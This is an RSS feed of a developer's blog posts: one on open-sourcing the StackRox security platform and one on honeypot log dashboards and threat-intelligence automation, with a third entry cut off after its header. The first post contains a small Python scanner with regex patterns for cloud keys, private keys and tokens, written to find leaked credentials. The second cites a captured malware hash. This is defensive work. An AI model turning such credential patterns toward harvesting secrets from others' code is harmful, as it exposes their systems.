<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Mat</title>
    <description>The latest articles on DEV Community by Mat (@mat_zilla).</description>
    <link>https://dev.to/mat_zilla</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F340958%2Fd2e6d691-d66d-4e70-9169-73ca3105f049.jpeg</url>
      <title>DEV Community: Mat</title>
      <link>https://dev.to/mat_zilla</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/mat_zilla"/>
    <language>en</language>
    <item>
      <title>How to Open Source Your Project</title>
      <dc:creator>Mat</dc:creator>
      <pubDate>Tue, 02 Aug 2022 12:57:48 +0000</pubDate>
      <link>https://dev.to/mat_zilla/how-to-open-source-your-project-3dbm</link>
      <guid>https://dev.to/mat_zilla/how-to-open-source-your-project-3dbm</guid>
      <description>&lt;p&gt;On April 1 2022, the release of the StackRox Community Platform was announced. This is the result of a great deal of work by our team to transition StackRox’s proprietary security platform into an open source one.&lt;br&gt;
I've been working behind the scenes and want to share a bit of insight into the challenges that bigger projects might face when opening up.&lt;/p&gt;

&lt;p&gt;Transitioning a project from private to public development means more than just changing the visibility of the GitHub repositories. It is essential to have a transition plan, especially if the goal is to build a thriving community where users can grow and leverage the platform.&lt;/p&gt;

&lt;p&gt;To have the best chance of success, the project’s goals and the community’s goals should be as aligned as possible.&lt;/p&gt;

&lt;p&gt;For the StackRox team, one of our top goals was to set the entry barrier as low as possible for contributors and community users. I’ve personally found this to be a significant challenge.&lt;/p&gt;

&lt;p&gt;It is one thing to tailor your environment to engineers, hoping to provide a thorough and guided onboarding experience. Creating a forum for a greater community of developers, operations and security folks poses an entirely different challenge.&lt;/p&gt;

&lt;h2&gt;Part I: Your Product and Your Engineering Team&lt;/h2&gt;

&lt;h3&gt;What Do We Open Source?&lt;/h3&gt;

&lt;p&gt;If you look at the &lt;a href="https://github.com/stackrox"&gt;StackRox GitHub organization&lt;/a&gt;, you will find a multitude of repositories, with the platform comprising many different components and features that could have been kept private. However, we chose to be thorough and take the extra time. We decided to open the complete platform and all its dependencies, including our out-of-the-box policy ruleset that we ship on new installations, prebuilt Docker images, and Helm charts to make the open source deployment as easy as possible.&lt;/p&gt;

&lt;h3&gt;What License Do We Use?&lt;/h3&gt;

&lt;p&gt;When opening your source code, the first task should be to select a license that fits your use case. In most cases, it is advisable to include your legal department in this discussion, and &lt;a href="https://docs.github.com/en/repositories/managing-your-repositorys-settings-and-features/customizing-your-repository/licensing-a-repository"&gt;GitHub has many great resources&lt;/a&gt; to help you with this process. For StackRox, we oriented ourselves on comparable Red Hat projects and popular open source projects and picked Apache 2.0 where possible.&lt;/p&gt;

&lt;h3&gt;How Can People Access It?&lt;/h3&gt;

&lt;p&gt;After you’ve decided on what parts you open up and how you will open them, the next question is, how will you make this available?&lt;/p&gt;

&lt;p&gt;Besides the source code itself, for StackRox, there are also Docker images, as mentioned. That means we also open the CI process to the public. For that to happen, I highly recommend you review your CI process. Assume that any insecure configuration will be used against you. Review common patterns for internal CI processes like credentials, service accounts, deployment keys or storage access.&lt;/p&gt;
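&lt;p&gt;As an illustration of what such a review can look for (this is a hypothetical sketch, not our actual process; dedicated scanners like gitleaks or trufflehog go much further), a handful of regex patterns already catch the most common credential leaks before a repository goes public:&lt;/p&gt;

```python
import re

# Illustrative patterns only; the names and regexes below are examples,
# not an exhaustive or production-grade rule set.
SECRET_PATTERNS = {
    "aws_access_key": re.compile(r"AKIA[0-9A-Z]{16}"),
    "private_key": re.compile(r"-----BEGIN (?:RSA |EC )?PRIVATE KEY-----"),
    "generic_token": re.compile(
        r"(?i)(?:api[_-]?key|token|secret)\s*[:=]\s*['\"][^'\"]{16,}['\"]"
    ),
}

def scan_text(text):
    """Return a list of (pattern_name, match) findings for one file's text."""
    findings = []
    for name, pattern in SECRET_PATTERNS.items():
        for match in pattern.findall(text):
            findings.append((name, match))
    return findings
```

&lt;p&gt;Running something like this over the working tree and the full git history gives a first impression of what would leak; flagged findings still need manual review.&lt;/p&gt;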

&lt;p&gt;Also, it should be abundantly clear who can trigger CI runs, as your CI credits/resources are usually quite limited, and CI integrations have been known to &lt;a href="https://www.infoq.com/news/2021/04/GitHub-actions-cryptomining/"&gt;run cryptominers&lt;/a&gt; or other harmful software.&lt;/p&gt;

&lt;h2&gt;How Do We Manage It?&lt;/h2&gt;

&lt;p&gt;StackRox is built publicly as the upstream project, whereas Red Hat Advanced Cluster Security (RHACS) is built on an internal Red Hat build system. Tending to two different build pipelines naturally brings some overhead, as the open source and commercial flavors of this project each have different needs.&lt;/p&gt;

&lt;p&gt;If all goes well and your CI succeeds, you will most likely end up with some artifact — a release binary, tgz file or Docker image — which raises the next question:&lt;/p&gt;

&lt;h3&gt;How Do We Distribute It?&lt;/h3&gt;

&lt;p&gt;Making these artifacts publicly available to lower the barrier of entry is essential.&lt;/p&gt;

&lt;p&gt;For StackRox, we decided to push built images to a &lt;a href="https://quay.io/stackrox-io"&gt;public organization at Quay&lt;/a&gt;. Alternatively, you can use GitHub’s release feature or other public distribution channels, depending on your release artifact type, such as NPM, PyPI, or Crates. After distribution, the next step would be users downloading these artifacts and running your product. This brings us to the next important question.&lt;/p&gt;

&lt;h3&gt;How Do We Document It?&lt;/h3&gt;

&lt;p&gt;The documentation is the public representation of your project, inviting users and contributors alike. Potential users will often consult your documentation first to gauge whether your project fits their use case and to understand how to use it most efficiently. Ideally, documentation conveys information to the community while minimizing user confusion and the number of clarification issues in your GitHub repository.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Remember that documentation for operators and documentation for developers are two very different things.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;For example:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Operators are interested in the deployment, configuration, platform maintenance, data preservation, updates and disaster recovery.&lt;/li&gt;
&lt;li&gt;Developers are interested in setting up a development environment (IDE, local deployment, debug builds, etc.) and getting access to detailed API descriptions.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Both target audiences profit heavily from “Getting Started” guides, be it how to get your first deployment up and running (operators), or how you accomplish everyday extension tasks in the codebase (developers).&lt;/p&gt;

&lt;p&gt;Because StackRox is upstream of RHACS, we decided to focus our documentation efforts on developers, as quite a lot of user-tailored documentation is available. Open source-specific user documentation with StackRox branding is a project we’re planning right now, though.&lt;/p&gt;

&lt;p&gt;Our developer-tailored documentation is being expanded in the &lt;a href="https://github.com/stackrox/stackrox/blob/master/README.md"&gt;main project’s README&lt;/a&gt; and &lt;a href="https://github.com/stackrox/dev-docs/"&gt;stackrox/dev-docs&lt;/a&gt;. The latter is a collection of Markdown guides that started life as private Confluence articles. This collection keeps growing, especially as we get more feedback from contributors on which guides they would like to see. Migrating additional guides and how-tos that were missed in the first migration, or that were held back because they contain private information, is also a continued effort.&lt;/p&gt;

&lt;h3&gt;How Do We Manage Privacy?&lt;/h3&gt;

&lt;p&gt;Speaking of private information: Due to the nature of git, the complete history of your project will be public, starting with the first commit to the repository you publish. The same applies to any issues, discussions and pull requests that your project has collected over time. While this is a nonissue for internal development, it can pose quite a problem when going public.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;It is strongly advised that you review all your issues and comments — on GitHub or other git repositories — and comb the project’s git history, PRs, and issues for any information or references not intended for public use.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;None of this information needs to be public for the project to be considered open source, but it does add context for future users and your own devs, so you might want to keep as much of it intact as possible.&lt;/p&gt;

&lt;p&gt;A quick and easy way out is to start a new project on GitHub and do away with your git history. However, this approach poses multiple problems.&lt;/p&gt;

&lt;p&gt;Your engineering team loses the history of their work, problem-solving and discussions, which are valuable resources. Furthermore, this step has to be planned well, and the engineering team must be in the know — if one person pushes their old git history to your new project, the complete history will be accessible again.&lt;/p&gt;

&lt;h3&gt;How Do We Handle CVEs?&lt;/h3&gt;

&lt;p&gt;Speaking of visibility: If you handle CVE/embargoed work, you will need a workflow in place. As your repository is public, you cannot simply use a public feature branch for this kind of work. For example, GitHub provides the option of &lt;a href="https://docs.github.com/en/code-security/repository-security-advisories/collaborating-in-a-temporary-private-fork-to-resolve-a-repository-security-vulnerability"&gt;temporary private forks to resolve security issues&lt;/a&gt;.&lt;/p&gt;

&lt;h3&gt;How Do We Take Care of Our People?&lt;/h3&gt;

&lt;p&gt;Last but not least: As already mentioned, in all of these tasks, you should take care to keep your engineering team involved and in the know at all times.&lt;/p&gt;

&lt;p&gt;The Red Hat Advanced Cluster Security (RHACS) engineering team works in a design-document-driven process, where all major changes are discussed between the whole engineering team through shared documents and discussions, written (document comments) and spoken (review meetings).&lt;/p&gt;

&lt;p&gt;In the months leading to our announcement, we conducted many discussions and tried to find solutions, workflows and approaches that the team was happy with.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;As the engineering team will still be the main driver for the project, they should know what changes in their daily work once you go open source.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Additionally, this is an excellent opportunity for initial external OSS contributions. If you maintain private forks with product-specific patches, this is the chance to shine by offering these changes to the original upstream projects.&lt;/p&gt;

&lt;p&gt;For our engineers, little changed. They still work primarily in the upstream repositories, with the main difference that all pull requests and their discussions are now publicly visible. This change means that teams need to be mindful of how they communicate, even internally, as all comments can be read by external people who might lack the context or shared humor your team has.&lt;/p&gt;

&lt;h2&gt;Part II: Community, Collaboration, Context&lt;/h2&gt;

&lt;h3&gt;How Do We Enable Healthy Discussion?&lt;/h3&gt;

&lt;p&gt;As your audience grows, it is vital that you define clear rules to create a safe environment for everyone to participate. A common way of doing this is to define a code of conduct (CoC), which sets some basic guidelines on what kind of community interaction will not be tolerated. We decided to stick to well-established frameworks and based our CoC on the &lt;a href="https://www.contributor-covenant.org/"&gt;Contributor Covenant&lt;/a&gt;.&lt;/p&gt;

&lt;h3&gt;How Do We Help Keep the Discussion Healthy?&lt;/h3&gt;

&lt;p&gt;The best CoC definition doesn’t help if there is no one there to enforce it. This meant we needed to find volunteers for a CoC committee and train them accordingly. The committee members should be publicly available and open for communication so they can be approached in case of any problems.&lt;/p&gt;

&lt;p&gt;We did this by publishing the CoC and the committee members on our &lt;a href="https://www.stackrox.io/code-conduct/"&gt;community website&lt;/a&gt;.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;As your audience grows, it is vital that you define clear rules to create a safe environment for everyone to participate.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;Where Can We Communicate with the Community?&lt;/h3&gt;

&lt;p&gt;At this point, you should be aware of the goal of your open source go-live and the expected target audience. Answers to these questions shape how you interact with your community. Use all channels you have to reach out, but decide on one discussion medium out of the plethora available today, such as Slack, Discord, mailing list, forums or Matrix.&lt;/p&gt;

&lt;p&gt;The StackRox community currently lives on the &lt;a href="https://www.stackrox.io/slack/"&gt;CNCF Slack workspace in the channel #stackrox&lt;/a&gt;.&lt;/p&gt;

&lt;h3&gt;How Do We Accept Contributions?&lt;/h3&gt;

&lt;p&gt;Be clear and concise in what you accept from contributors. Is it only feedback in discussions? Do you accept issues or pull requests on GitHub? If so, it is recommended to provide guidelines in the form of a &lt;code&gt;CONTRIBUTING.md&lt;/code&gt; document or Issue/PR templates to fill out.&lt;/p&gt;

&lt;p&gt;If you decide to accept these, it also helps to give people a rough idea of your reaction times. Also, be sure to have processes in place to decide who keeps an eye on new items.&lt;/p&gt;

&lt;p&gt;For example, we communicate that we aim to triage new issues and PRs within a week, with more detailed discussions and decisions communicated in our monthly meetings.&lt;/p&gt;

&lt;h3&gt;How Will We Meet with the Community?&lt;/h3&gt;

&lt;p&gt;Regular public meetings lower the bar for participation and allow for issues to be raised efficiently. Any interested contributors can quickly stop by and get in touch with your project.&lt;/p&gt;

&lt;p&gt;Currently, we run our StackRox Community meeting on the second Tuesday of each month at 9 a.m. PST, 12 p.m. EST, 5 p.m. GMT. You can subscribe to the events by adding the &lt;a href="mailto:community@stackrox.com"&gt;community@stackrox.com&lt;/a&gt; calendar to your own.&lt;/p&gt;

&lt;p&gt;In these meetings, we discuss and show demos of upcoming features, talk about open issues, present guides and how-tos, and have an open forum for Q&amp;amp;A with the community.&lt;/p&gt;

&lt;h2&gt;Part III: Your Turn&lt;/h2&gt;

&lt;p&gt;Over the past year and a half, we have worked diligently to create a completely open source Kubernetes security platform. The next step for us is to help harden as many container workloads as possible. To accomplish this goal, we need feedback from users. We would love to see you in our Slack channel, starring the GitHub repository and becoming our monthly “RoxStar.”&lt;/p&gt;

&lt;p&gt;If you have any questions or would like to contribute to StackRox, stop by in the CNCF Slack or join the next community meeting!&lt;/p&gt;

</description>
      <category>opensource</category>
      <category>security</category>
      <category>kubernetes</category>
      <category>go</category>
    </item>
    <item>
      <title>Honeypot Data Visualization &amp; Automation</title>
      <dc:creator>Mat</dc:creator>
      <pubDate>Fri, 05 Mar 2021 16:54:23 +0000</pubDate>
      <link>https://dev.to/mat_zilla/honeypot-data-visualization-automation-513g</link>
      <guid>https://dev.to/mat_zilla/honeypot-data-visualization-automation-513g</guid>
      <description>&lt;p&gt;This is the final part of a series detailing visualization, automation, deployment considerations, and pitfalls of Honeypots.&lt;br&gt;&lt;br&gt;
An extended version of this article and an according talk can be found at &lt;a href="https://vblocalhost.com/conference/presentations/like-bees-to-a-honeypot-a-journey-through-honeypots/"&gt;Virus Bulletin 2020&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;After successful installation and customization, the deployed Honeypots start generating data. One of the main challenges at this stage is sifting through the logs and finding interesting events. Humans aren't good at digesting big chunks of text; most people can grasp graphics much more quickly.&lt;br&gt;&lt;br&gt;
Hence, having dashboards is a good way of getting a quick overview of what's happening.  &lt;/p&gt;

&lt;h2&gt;Sifting Through the Data&lt;/h2&gt;

&lt;p&gt;The current state of our deployment is this: Logs over logs over logs.&lt;br&gt;&lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--35rApAHa--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://maddosaurus.github.io/images/logs.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--35rApAHa--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://maddosaurus.github.io/images/logs.png" alt="Screenshot of 4 terminal windows filled with logs of different honeypots" width="602" height="338"&gt;&lt;/a&gt;  &lt;/p&gt;

&lt;p&gt;As logs are not tailored for human consumption, they are notoriously hard to read and check. This is where visualizations come into play. The author recommends ingesting logs into a central system like Elastic or Splunk that indexes the generated data.&lt;br&gt;&lt;br&gt;
Besides making all log data available for dashboards, this has the advantage of collecting the logs of every deployed Honeypot in your infrastructure on one central system, which enables dashboard and report generation across the whole infrastructure and deeper insights.&lt;br&gt;&lt;br&gt;
For the remainder of this article it is assumed that all logs are collected in a central Splunk instance, which is also used for the shown dashboards.&lt;br&gt;
Some key metrics the author finds useful for daily work are:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Connecting Source IP&lt;/li&gt;
&lt;li&gt;Number of different Source IPs in the last 60 minutes&lt;/li&gt;
&lt;li&gt;Top 10 connection counts by Source IP&lt;/li&gt;
&lt;li&gt;Username / Password pairs (failed &amp;amp; successful)&lt;/li&gt;
&lt;li&gt;SHA256 hashes of captured payloads&lt;/li&gt;
&lt;li&gt;List of executed commands (depending on Honeypot)&lt;/li&gt;
&lt;li&gt;Unique connection identifiers (i.e. SSH keys or client version strings)&lt;/li&gt;
&lt;/ul&gt;
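&lt;p&gt;As a hedged sketch (the event shape and the addresses below are invented for illustration), the first few of these metrics could be derived in plain Python from parsed log events:&lt;/p&gt;

```python
from collections import Counter
from datetime import datetime, timedelta

# Hypothetical minimal event shape: each honeypot log line parsed into
# a dict with at least a timestamp and a source IP.
events = [
    {"ts": datetime(2021, 3, 5, 12, 0), "src_ip": "203.0.113.7"},
    {"ts": datetime(2021, 3, 5, 12, 5), "src_ip": "203.0.113.7"},
    {"ts": datetime(2021, 3, 5, 12, 9), "src_ip": "198.51.100.23"},
]

def top_sources(events, n=10):
    """Top-n connection counts by source IP."""
    return Counter(e["src_ip"] for e in events).most_common(n)

def unique_sources_since(events, now, minutes=60):
    """Number of distinct source IPs seen in the last `minutes`."""
    cutoff = now - timedelta(minutes=minutes)
    return len({e["src_ip"] for e in events if e["ts"] >= cutoff})
```

&lt;p&gt;In the deployment described here, the same aggregations would of course be expressed as Splunk searches rather than ad hoc scripts.&lt;/p&gt;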

&lt;p&gt;Using dashboards is no turnkey solution for better insight into the produced log data. It is still the user's responsibility to clean the data before plotting it. In this context it is worth borrowing &lt;a href="https://www.kdnuggets.com/2018/12/six-steps-master-machine-learning-data-preparation.html"&gt;common dataset preparation procedures from the area of Machine Learning&lt;/a&gt;. One example is the deduplication of events, e.g. multiple connections from the same source IP: while in some scenarios this repetition is interesting, e.g. for spotting credential stuffing attacks, it is counterproductive in others, like the absolute count of unique connections in a given timeframe.&lt;br&gt;&lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--_Cvguxa2--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://maddosaurus.github.io/images/splunk-noise.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--_Cvguxa2--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://maddosaurus.github.io/images/splunk-noise.png" alt="Screenshot of a table consisting of files with different SHA256 hashes but the same filename" width="880" height="304"&gt;&lt;/a&gt;&lt;br&gt;&lt;br&gt;
The screenshot above shows an example of noise in a dashboard. The file &lt;code&gt;/tmp/up.txt&lt;/code&gt; is generated with different content but is always written to the same path. While the file itself is part of an evasion technique, it also fills up dashboards that show the latest captured payloads. This is where filtering can help keep dashboards effective by lowering noise. After validating that the created file is indeed noise, it can be filtered by its path. Nevertheless, the contents of this file might change, and so might its importance; with the filter in place, such a change is easily overlooked. Therefore, continuous data analysis and pattern recognition are required to keep a dashboard valuable and usable.&lt;/p&gt;
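&lt;p&gt;A minimal sketch of such a filter, assuming events have been parsed into dicts with &lt;code&gt;path&lt;/code&gt; and &lt;code&gt;sha256&lt;/code&gt; fields (the function and field names are hypothetical; in the deployment above this would live in a Splunk search instead):&lt;/p&gt;

```python
# Hypothetical noise filter for payload events, modeled on the
# /tmp/up.txt example: a deny-list maps a reviewed path to the content
# hash that was classified as noise. Events for that path are dropped
# only while the hash still matches, so changed content resurfaces
# instead of being silently filtered away.
def filter_noise(events, known_noise):
    """Keep events that are new, or known-noisy paths with new content."""
    kept = []
    for event in events:
        reviewed_hash = known_noise.get(event["path"])
        if reviewed_hash is None or event["sha256"] != reviewed_hash:
            kept.append(event)
    return kept
```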

&lt;h2&gt;Automating Workflows&lt;/h2&gt;

&lt;p&gt;At this point the infrastructure consists of several running Honeypots that are producing data, which in turn is sent to a Splunk instance for indexing and dashboard generation. &lt;br&gt;
Having a static dashboard with basic metrics is helpful for getting a grasp on the state of the infrastructure. If Honeypots are used in a more active scenario, e.g. for Threat Hunting, it is favourable to add common lookups and shortcuts to a dashboard to improve initial triage times. The proposed Splunk dashboard therefore contains contextual links to VirusTotal, Shodan and GreyNoise.&lt;br&gt;&lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--_6042IMz--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://maddosaurus.github.io/images/architecture.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--_6042IMz--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://maddosaurus.github.io/images/architecture.png" alt="Architecture diagram detailing the different honeypots, their data flow, and integrations to Splunk, MISP and TheHive." width="880" height="426"&gt;&lt;/a&gt;&lt;br&gt;&lt;br&gt;
All encountered SHA256 hashes are direct links to VirusTotal searches, clickable IP addresses refer to Shodan and Autonomous System Numbers (ASNs) are used as a lookup for GreyNoise. These services should provide enough information to decide whether a detailed investigation could lead to interesting insights.&lt;br&gt;&lt;br&gt;
To further decrease the number of manual tasks, one can also consider using Threat Intelligence Platforms (TIPs) like MISP, which offer automated enrichment and analysis capabilities for submitted samples. Most Honeypots either already have API capabilities to upload payloads to a target server or can be retrofitted to do so with little effort. In the showcased infrastructure, Cowrie is configured to query a MISP instance for the SHA256 hash of every encountered payload. If the payload is unknown, a new case is created in MISP and the payload is attached to it. If it was encountered before, a “sighting” event is added to the corresponding case.&lt;br&gt;&lt;br&gt;
The advantage of platforms like MISP is the community aspect and the integrated enrichment capabilities that can give samples and payloads context, IOCs, and analyses of other members of a sharing group. In the presented architecture, this role is fulfilled by a tandem of MISP and TheHive. TheHive is another TIP that focuses more on external integrations and analyzers. In its current state, every encountered payload is uploaded to MISP, followed by an automated case creation in TheHive. This enables analysts to run analyzers with little additional overhead, as they do not need to create case files and upload samples by themselves.&lt;br&gt;&lt;br&gt;
This area of the proposed architecture can also be carried out by a Security Orchestration, Automation and Response (SOAR) system to further automate responses and increase analytic capabilities.&lt;/p&gt;
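&lt;p&gt;The create-a-case-or-add-a-sighting behaviour described above can be sketched as follows, with an in-memory dict standing in for the MISP instance (purely illustrative; the real integration talks to MISP’s REST API, e.g. via PyMISP, and all names here are hypothetical):&lt;/p&gt;

```python
# Sketch of the "create a case or add a sighting" decision: unknown
# payload hashes get a new case holding the supplied metadata, while
# hashes seen before get an additional sighting instead.
def record_payload(store, sha256, metadata):
    """Register an encountered payload hash in the given store."""
    case = store.get(sha256)
    if case is None:
        # First encounter: create a new case for this payload.
        case = {"metadata": metadata, "sightings": 0}
        store[sha256] = case
    else:
        # Known payload: just count another sighting.
        case["sightings"] += 1
    return case
```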

&lt;h2&gt;Example Workflow&lt;/h2&gt;

&lt;p&gt;To illustrate the described system integration and workflows, we assume a file was uploaded to one of the Cowrie SSH Honeypots with the SHA256 hash of &lt;code&gt;69787a2a5d2e29e44ca372a6c6de09d52ae2ae46d4dda18bf0ee81c07e6e921d&lt;/code&gt;. As a first measure of interest, this file can be investigated in the Splunk dashboard:&lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--gvcWpql7--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://maddosaurus.github.io/images/links.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--gvcWpql7--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://maddosaurus.github.io/images/links.png" alt="Splunk dashboard with breakout images showing previews of each linked service of the mentioned hash" width="880" height="628"&gt;&lt;/a&gt;&lt;br&gt;&lt;br&gt;
The dashboard already provides some valuable information at first sight: the payload was uploaded using the default credentials for a Raspberry Pi, and the connecting address was geolocated to Switzerland. By clicking on the hash or the IP address, either VirusTotal or Shodan can be checked for initial information. Last but not least, a click on the ASN leads to a GreyNoise query that lists all known systems in this ASN, which adds context to the IP by indicating whether the ASN is notorious for malicious traffic.&lt;br&gt;&lt;br&gt;
After this cursory glance, it is decided to investigate the sample further. Based on the information provided by Shodan and VirusTotal, the current working hypothesis is that this is a Bash IRC bot distributed by a system with a Raspberry Pi SSH version string.&lt;br&gt;&lt;br&gt;
As the payload was dropped on an integrated SSH honeypot, it has already been uploaded to a connected MISP instance where a new case has been created (or, in case the payload already exists, a sighting has been added). The event already has the uploaded file attached as a malware sample, including additional metadata such as common file hashes, the size in bytes and the entropy. From here on out, it is possible to make use of the MISP ecosystem to share and enrich encountered samples, for example through MISP Communities or MISP Community Feeds, as well as MISP plugins that integrate it with other products.&lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--EFz5CWiY--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://maddosaurus.github.io/images/misp1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--EFz5CWiY--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://maddosaurus.github.io/images/misp1.png" alt="MISP overview of the case with all attached artifacts" width="880" height="337"&gt;&lt;/a&gt;&lt;br&gt;&lt;br&gt;
While the community aspect of MISP is its strong suit, there are other contenders when it comes to effective integrations with third-party products. The tandem of TheHive and Cortex is an alternative that focuses more on such integrations. It consists of one or multiple Cortex instances that are responsible for running so-called analyzers, which make use of several external services like IBM X-Force, RiskIQ PassiveTotal, or Have I Been Pwned. This is complemented by TheHive, which in turn offers case management, intel collection and templating capabilities.&lt;br&gt;&lt;br&gt;
Additionally, MISP and TheHive can work in two-way synchronization mode, which unites the strengths of both platforms into an excellent solution for managing, tracking, and optimizing investigations. For the example at hand, this means that an incoming alert for the discovered IRC bot is awaiting its import as a case in TheHive.&lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--z1E2xZz5--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://maddosaurus.github.io/images/hive.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--z1E2xZz5--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://maddosaurus.github.io/images/hive.png" alt="Hive overview with results of different lookups" width="880" height="460"&gt;&lt;/a&gt;&lt;br&gt;&lt;br&gt;
The payload and all its observables from MISP are imported and available for use in Cortex analyzers. As these are run, they generate additional observables and reports that can be added to the case at hand, as can be seen in the screenshot. The red tags attached to the hash and the file stem from critical results obtained by querying IBM X-Force and VirusTotal. All added metadata can also be synced back to MISP for integrity and sharing purposes.&lt;br&gt;&lt;br&gt;
At this point, an upload has been found and without opening the file itself, a preliminary examination was conducted which lead to the decision to further investigate the incident. The file was added to MISP and The Hive with minimal to no user interaction and made available to enrichment plugins and communities, therefore accelerating and improving the process of manual analysis and investigation.&lt;/p&gt;

&lt;h2&gt;Conclusions&lt;/h2&gt;

&lt;p&gt;Successfully deploying and integrating Honeypots and supporting software into an existing infrastructure can be a daunting task that requires a decent amount of planning. Nevertheless, the advantages are evident:&lt;br&gt;&lt;br&gt;
If integrated correctly, Honeypots enable faster alerting and a pre-emptive view into current attack strategies and automated attacks against publicly available infrastructure, while supporting integrations based on TIPs like MISP or TheHive speed up triage, improve its quality and lower the amount of manual work done by analysts. Combined with widespread log collection and well-designed dashboards, this complements better defensive strategies and measures against novel attacks.&lt;br&gt;&lt;br&gt;
Especially with the continued popularity of container-based virtualization technologies, high-interaction Honeypots are expected to gain popularity and development traction. As it stands, this type of Honeypot is considerably harder to detect, which makes it well suited for internet-facing deployments: the architecture mitigates most commonly used evasion techniques simply by being a fully custom system that behaves consistently and as closely to a real system as possible.&lt;br&gt;&lt;br&gt;
Once deployed, Honeypots are a low-maintenance asset that can bring high value to the table, be it as a pre-emptive alerting system for internal infrastructure or as a sensor for discovering ongoing campaigns and credential stuffing attacks, collecting valuable intelligence without manual interaction.&lt;/p&gt;

&lt;p&gt;This concludes the series on honeypots. As a closing note, some resources can be recommended for getting started with custom deployments.&lt;br&gt;&lt;br&gt;
A good overview of common resources and projects is the repo &lt;a href="https://github.com/paralax/awesome-honeypots"&gt;awesome-honeypots&lt;/a&gt;, which can be of great help if a Honeypot for a specific service or system is needed.&lt;br&gt;&lt;br&gt;
First and foremost, there is &lt;a href="https://github.com/dtag-dev-sec/tpotce"&gt;T-Pot&lt;/a&gt;, an all-in-one solution that bundles multiple Honeypots with an Elastic stack, custom dashboards and a multitude of tools. The project is developed by Telekom Security and offers a quick start at the price of customizability: as it is rather complex and relies heavily on containers, customizing the bundled Honeypots is not as straightforward as in custom deployments. Nevertheless, it is an excellent starting point to get a feeling for deployments.&lt;br&gt;&lt;br&gt;
A step closer to fully customized Honeypots are frameworks that abstract functionality shared between specific implementations. Examples are DutchSec’s &lt;a href="https://github.com/honeytrap/honeytrap"&gt;honeytrap&lt;/a&gt; and &lt;a href="https://github.com/Cymmetria/honeycomb"&gt;Cymmetria’s honeycomb&lt;/a&gt;. Frameworks can speed up the development of custom Honeypots but come at the price of a predefined structure, as they rely heavily on conventions to work correctly.&lt;br&gt;&lt;br&gt;
With the release of this paper, the presented Splunk dashboards are made available for general use and can be found &lt;a href="https://github.com/CMSecurity/splunk-hp-dashs"&gt;in this repository&lt;/a&gt;. The organization also holds repositories with the custom-developed SMTP Honeypot &lt;a href="https://github.com/CMSecurity/mailhon"&gt;mailhon&lt;/a&gt; as well as an IP camera Honeypot, &lt;a href="https://github.com/CMSecurity/CameraObscura"&gt;CameraObscura&lt;/a&gt;. Finally, the last project used in the demonstrated environment is an Android Debug Bridge Honeypot by the name of &lt;a href="https://github.com/huuck/ADBHoney"&gt;ADBHoney&lt;/a&gt;.&lt;br&gt;&lt;br&gt;
Last but not least, &lt;a href="https://www.honeynet.org/"&gt;Honeynet&lt;/a&gt; deserves mention as a central research organization dedicated to the continued development of Honeypots as well as investigations into ongoing attacks.&lt;/p&gt;

</description>
      <category>malware</category>
      <category>honeypot</category>
      <category>threatintelligence</category>
      <category>security</category>
    </item>
    <item>
      <title>Honeypot Deployment and Customization</title>
      <dc:creator>Mat</dc:creator>
      <pubDate>Tue, 24 Nov 2020 18:54:10 +0000</pubDate>
      <link>https://dev.to/mat_zilla/honeypot-deployment-and-customization-4i28</link>
      <guid>https://dev.to/mat_zilla/honeypot-deployment-and-customization-4i28</guid>
